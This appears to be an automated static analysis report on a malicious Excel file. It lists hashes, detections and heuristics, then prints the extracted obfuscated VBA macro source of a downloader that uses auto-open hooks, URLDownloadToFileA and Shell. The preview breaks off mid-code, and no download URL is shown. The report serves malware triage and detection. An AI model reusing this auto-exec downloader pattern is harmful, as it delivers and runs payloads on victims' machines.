Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3f93d1778079eaf0…

MALICIOUS

Office (OLE)

Size: 106.5 KB
Created: 2016-05-08 22:17:53
Authoring application: Microsoft Excel
First seen: 2019-08-04
MD5: f5971ae12d4c0e6460865e4f32bde1db
SHA-1: ed6c867f72f529a52ae06e471ea05868ea4c1ae6
SHA-256: 3f93d1778079eaf080d57300ca0264199c13408e73c59b2d2318bb7a42c8e202
Risk Score: 394

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1105 Ingress Tool Transfer
  • T1204.002 Malicious File

The file contains heavily obfuscated VBA macros, including AutoOpen and Workbook_Open events, which are designed to execute automatically. These macros utilize the URLDownloadToFile API and Shell() function, indicating an intent to download and execute a secondary payload from a remote source. The presence of these indicators and the ClamAV detection strongly suggest a downloader malware.

Heuristics 12

  • ClamAV: Doc.Downloader.Generic-6680466-0 (severity: critical; ID: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Generic-6680466-0
  • Reference to URLDownloadToFile API (severity: critical; ID: SC_STR_URLDOWNLOAD)
  • VBA macros detected (severity: medium; 8 related findings; ID: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Potential Shell call in VBA (severity: critical; ID: OLE_VBA_SHELL)
    Matched line in script
    uYfIQORnSxJpkm VfShullmLEqBzN, IdqbMkbajbpny
    Call Shell(IdqbMkbajbpny, vbNormalFocus)
    End Sub
  • URLDownloadToFile in VBA (severity: critical; ID: OLE_VBA_DOWNLOAD)
    Matched line in script
    Private Declare PtrSafe Function  ubTCFHUIOuhPg Lib "kernel32" Alias "DisassociateCurrentThreadFromCallback"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
    Private Declare PtrSafe Function yGeYLIYEmnWLhX Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pfsseerwseer As Long, ByVal sfswerreL As String, ByVal sfeNawfeme As String, ByVal dwRerrvered As Long, ByVal lsfepfsdfsnCB As Long) As Long
    Private Declare PtrSafe Function  aJlUhZtzzVZLTN Lib "kernel32" Alias "CopyContext"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
  • Obfuscated auto-exec VBA loader (severity: critical; ID: OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    uYfIQORnSxJpkm VfShullmLEqBzN, IdqbMkbajbpny
    Call Shell(IdqbMkbajbpny, vbNormalFocus)
    End Sub
  • VBA p-code auto-exec with execution tokens (severity: high; ID: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro (severity: low; ID: OLE_VBA_AUTOOPEN)
    Matched line in script
    End Sub
    Sub AutoOpen()
    oncSETPgyuUcvK
  • Workbook_Open macro (severity: low; ID: OLE_VBA_WBOPEN)
    Matched line in script
    End Function
    Sub Workbook_Open()
    oncSETPgyuUcvK
  • Auto_Open macro (severity: low; ID: OLE_VBA_AUTO)
    Matched line in script
    End Sub
    Sub Auto_Open()
    oncSETPgyuUcvK
  • Environ() call (env variable access) (severity: low; ID: OLE_VBA_ENVIRON)
    Matched line in script
    kaXbtWhUKBZHLV = pTTbNWEDYVEMH("uv5newo")
    IdqbMkbajbpny = Environ$(Chr(4 + 20 + 60) + Chr(50 + 27) + Chr(80 + 20 - 20)) + Chr(92) & kaXbtWhUKBZHLV
    If NPQMMuHNGqHNP = "aInMJhEKnvhmoE" Then
  • Suspicious extracted artifact (severity: info; ID: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 26046 bytes
SHA-256: 65f29d0df752ba2e224189534951ddd87692e2b39edb6edf8ec2512f6cbd40e9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
108 of 195 identifiers look randomly generated (e.g. 'IZJCpAhqSBpCocuZbXJSxPaFkMUa') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub gerdfdfnfndfndntjr()

End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'IZJCpAhqSBpCocuZbXJSxPaFkMUa

'uwpHcTXacOMpCy
'LUXZCqoOCdZSQ

#If VBA7 Then
Private Declare PtrSafe Function  BBtnBwqPmFbjGf Lib "kernel32" Alias "SetEndOfFile"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  XQKzcbSVpUEeZy Lib "kernel32" Alias "GetSLCallbackTarget"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  OlLiMlkyOvbixv Lib "kernel32" Alias "SetThreadContext"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  DRMQwzqSqlpBDJ Lib "kernel32" Alias "GetPK16SysVar"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  rrzfHOvQqCPIai Lib "kernel32" Alias "CreateMutexExA"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  ganMLYnlgBGsoF Lib "kernel32" Alias "uaw_wcsicmp"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  UOCtplbXHtktL Lib "kernel32" Alias "SUnMapLS_IP_EBP_24"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  PKNoQpndOMnqAp Lib "kernel32" Alias "GetPackagePathByFullName"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  sJFGXNhUIrFrfV Lib "kernel32" Alias "HeapDestroy"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  WHExbkLbJvNYRp Lib "kernel32" Alias "GetConsoleOutputCP"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  MgmFjtgpqEWOoH Lib "kernel32" Alias "WOWGlobalLock16"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  YhZrRhzABIsUHQ Lib "kernel32" Alias "CreateStateSubcontainer"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  hjpdFUbHViXWgD Lib "kernel32" Alias "MapHInstLS"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  tzdBMKOISfxhhs Lib "kernel32" Alias "EnumSystemGeoID"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  uHpgvGleVVsZF Lib "kernel32" Alias "GetModuleHandleExA"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  ZVELEcOESXapRa Lib "kernel32" Alias "HeapUnlock"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  eKUjQWnidVsaqc Lib "kernel32" Alias "EnumSystemGeoID"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  VjCrXgIwKeBQOv Lib "kernel32" Alias "AppXGetPackageCapabilities"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  qELuvNlmfnjhnt Lib "kernel32" Alias "PssWalkMarkerSeek"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  MwOWDqohgtjYo Lib "kernel32" Alias "GetLocaleInfoEx"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  quNNHNRnhyrgKH Lib "kernel32" Alias "UnlockFile"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  gTvVPXmBOGAWia Lib "kernel32" Alias "CreateDirectoryW"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  horiqWayJmjZmy Lib "kernel32" Alias "GetDefaultSortKeySize"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  ZzNbKhFqCKZqxG Lib "kernel32" Alias "SetConsoleCtrlHandler"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  TCoJWnOGXNIWvD Lib "kernel32" Alias "FindActCtxSectionGuidWorker"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  PQGcclstIPBneF Lib "kernel32" Alias "WerpNotifyUseStringResourceWorker"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  NxgNZrVvxgtOnl Lib "kernel32" Alias "Callback28"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  mYCQLSgNooPfqt Lib "kernel32" Alias "GetCommConfig"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  SHVitmRsfvuJuZ Lib "kernel32" Alias "IsProcessCritical"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  aoKmUcBIkLQYWN Lib "kernel32" Alias "SortCloseHandle"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  tPRvAXXKcuKzV Lib "kernel32" Alias "EnumResourceTypesW"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  iPkXVTjCODxbNN Lib "kernel32" Alias "SystemTimeToFileTime"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  WEzEzfwsFJkTSS Lib "kernel32" Alias "ReadFile"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  ZhyIlgPeZVsNdA Lib "kernel32" Alias "LoadStringBaseExW"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  eOBInWqTlDeMqy Lib "kernel32" Alias "GetProcessAffinityMask"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  iIsgYRiTwIsFGh Lib "kernel32" Alias "RtlMoveMemory"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  goWCcTesdQJJfZ Lib "kernel32" Alias "UnregisterWaitUntilOOBECompleted"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  ubTCFHUIOuhPg Lib "kernel32" Alias "DisassociateCurrentThreadFromCallback"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function yGeYLIYEmnWLhX Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pfsseerwseer As Long, ByVal sfswerreL As String, ByVal sfeNawfeme As String, ByVal dwRerrvered As Long, ByVal lsfepfsdfsnCB As Long) As Long
Private Declare PtrSafe Function  aJlUhZtzzVZLTN Lib "kernel32" Alias "CopyContext"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  QlDpDkhpDvkqid Lib "kernel32" Alias "DeleteTimerQueue"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  eWJCPWIZFBduSz Lib "kernel32" Alias "CreateTapePartition"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  UDHxIhzBQJaLhl Lib "kernel32" Alias "EnumSystemLocalesA"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  shUmFIMMlIqvje Lib "kernel32" Alias "SetFirmwareEnvironmentVariableExA"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  DeBjwyMJRSaWfg Lib "kernel32" Alias "SetFileBandwidthReservation"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  HWcECwnmbTvDau Lib "kernel32" Alias "GetStartupInfoW"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  bWvTvbLvHXkwCI Lib "kernel32" Alias "ReadConsoleA"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  qHCgGMneJecBme Lib "kernel32" Alias "HeapLock"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function  GeSHHvZeefjXoy Lib "kernel32" Alias "SetComputerNameEx2W"(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String,ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#Else
Private Declare Function BBtnBwqPmFbjGf Lib "kernel32" Alias "SetEndOfFile" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function pqIUfJCFdLObLl Lib "kernel32" Alias "SetProcessUserModeExceptionPolicy" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function eOBInWqTlDeMqy Lib "kernel32" Alias "GetProcessAffinityMask" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function iIsgYRiTwIsFGh Lib "kernel32" Alias "RtlMoveMemory" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function goWCcTesdQJJfZ Lib "kernel32" Alias "UnregisterWaitUntilOOBECompleted" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function ubTCFHUIOuhPg Lib "kernel32" Alias "DisassociateCurrentThreadFromCallback" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function aJlUhZtzzVZLTN Lib "kernel32" Alias "CopyContext" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function uHpgvGleVVsZF Lib "kernel32" Alias "GetModuleHandleExA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function tPRvAXXKcuKzV Lib "kernel32" Alias "EnumResourceTypesW" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function iPkXVTjCODxbNN Lib "kernel32" Alias "SystemTimeToFileTime" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function WEzEzfwsFJkTSS Lib "kernel32" Alias "ReadFile" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function SHVitmRsfvuJuZ Lib "kernel32" Alias "IsProcessCritical" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function sJFGXNhUIrFrfV Lib "kernel32" Alias "HeapDestroy" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function WHExbkLbJvNYRp Lib "kernel32" Alias "GetConsoleOutputCP" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function MgmFjtgpqEWOoH Lib "kernel32" Alias "WOWGlobalLock16" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function QlDpDkhpDvkqid Lib "kernel32" Alias "DeleteTimerQueue" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function eWJCPWIZFBduSz Lib "kernel32" Alias "CreateTapePartition" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function UDHxIhzBQJaLhl Lib "kernel32" Alias "EnumSystemLocalesA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function DeBjwyMJRSaWfg Lib "kernel32" Alias "SetFileBandwidthReservation" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function ZVELEcOESXapRa Lib "kernel32" Alias "HeapUnlock" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function eKUjQWnidVsaqc Lib "kernel32" Alias "EnumSystemGeoID" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function VjCrXgIwKeBQOv Lib "kernel32" Alias "AppXGetPackageCapabilities" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function hjpdFUbHViXWgD Lib "kernel32" Alias "MapHInstLS" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function aoKmUcBIkLQYWN Lib "kernel32" Alias "SortCloseHandle" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function HWcECwnmbTvDau Lib "kernel32" Alias "GetStartupInfoW" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function bWvTvbLvHXkwCI Lib "kernel32" Alias "ReadConsoleA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function qHCgGMneJecBme Lib "kernel32" Alias "HeapLock" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function GeSHHvZeefjXoy Lib "kernel32" Alias "SetComputerNameEx2W" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function DRMQwzqSqlpBDJ Lib "kernel32" Alias "GetPK16SysVar" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function aBzGTbXyMsBtyk Lib "kernel32" Alias "FlsAlloc" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function FrhKmweriyUytk Lib "kernel32" Alias "UpdateProcThreadAttribute" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function gGGBPXQKmaQBGD Lib "kernel32" Alias "GetConsoleKeyboardLayoutNameA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function tzdBMKOISfxhhs Lib "kernel32" Alias "EnumSystemGeoID" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function horiqWayJmjZmy Lib "kernel32" Alias "GetDefaultSortKeySize" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function qELuvNlmfnjhnt Lib "kernel32" Alias "PssWalkMarkerSeek" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function MwOWDqohgtjYo Lib "kernel32" Alias "GetLocaleInfoEx" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function quNNHNRnhyrgKH Lib "kernel32" Alias "UnlockFile" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function gTvVPXmBOGAWia Lib "kernel32" Alias "CreateDirectoryW" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function NxgNZrVvxgtOnl Lib "kernel32" Alias "Callback28" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function mYCQLSgNooPfqt Lib "kernel32" Alias "GetCommConfig" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function ZhyIlgPeZVsNdA Lib "kernel32" Alias "LoadStringBaseExW" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function shUmFIMMlIqvje Lib "kernel32" Alias "SetFirmwareEnvironmentVariableExA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function OwGeupkYVttHJV Lib "kernel32" Alias "GetGeoInfoW" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function dhMrFbMHWlMtr Lib "kernel32" Alias "CreateEventExW" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function SOKlymDjiHjdId Lib "kernel32" Alias "GlobalReAlloc" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function OCFuopVXuOpIXo Lib "kernel32" Alias "NeedCurrentDirectoryForExePathA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function HOqqnyRmoqXlES Lib "kernel32" Alias "VirtualQuery" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function yGeYLIYEmnWLhX Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pfsseerwseer As Long, ByVal sfswerreL As String, ByVal sfeNawfeme As String, ByVal dwRerrvered As Long, ByVal lsfepfsdfsnCB As Long) As Long
Private Declare Function mEYuGTYeKwqqS Lib "kernel32" Alias "SetProcessDefaultCpuSets" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function rrzfHOvQqCPIai Lib "kernel32" Alias "CreateMutexExA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function ganMLYnlgBGsoF Lib "kernel32" Alias "uaw_wcsicmp" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function UOCtplbXHtktL Lib "kernel32" Alias "SUnMapLS_IP_EBP_24" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function PKNoQpndOMnqAp Lib "kernel32" Alias "GetPackagePathByFullName" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function PQGcclstIPBneF Lib "kernel32" Alias "WerpNotifyUseStringResourceWorker" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function YhZrRhzABIsUHQ Lib "kernel32" Alias "CreateStateSubcontainer" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function ZzNbKhFqCKZqxG Lib "kernel32" Alias "SetConsoleCtrlHandler" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function TCoJWnOGXNIWvD Lib "kernel32" Alias "FindActCtxSectionGuidWorker" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#End If
Private Sub NjyXIwenARqxvR()
WBLKPoGLPszboZ = "RwWFqttNFxuhuD"
End Sub
Function uYfIQORnSxJpkm(ByVal obGqbTaDnBtVik As String, ByVal vFQprNbapJdMRh As String)
If fUVIffSrOlsCoF = "iWcSCbgFFpvWwI" Then
sefsVRVfvrFDFk = "djbyWfZxwvVxsc"
End If
yGeYLIYEmnWLhX 0 + 0, obGqbTaDnBtVik, vFQprNbapJdMRh, 5 - 5, 10 - 10
jBXNRbpyJVacS = hhBjWdlafRmeBJ
End Function
Private Sub oncSETPgyuUcvK()
noYhyXvIHDuzgy = fHgpgfwAmEHiMi
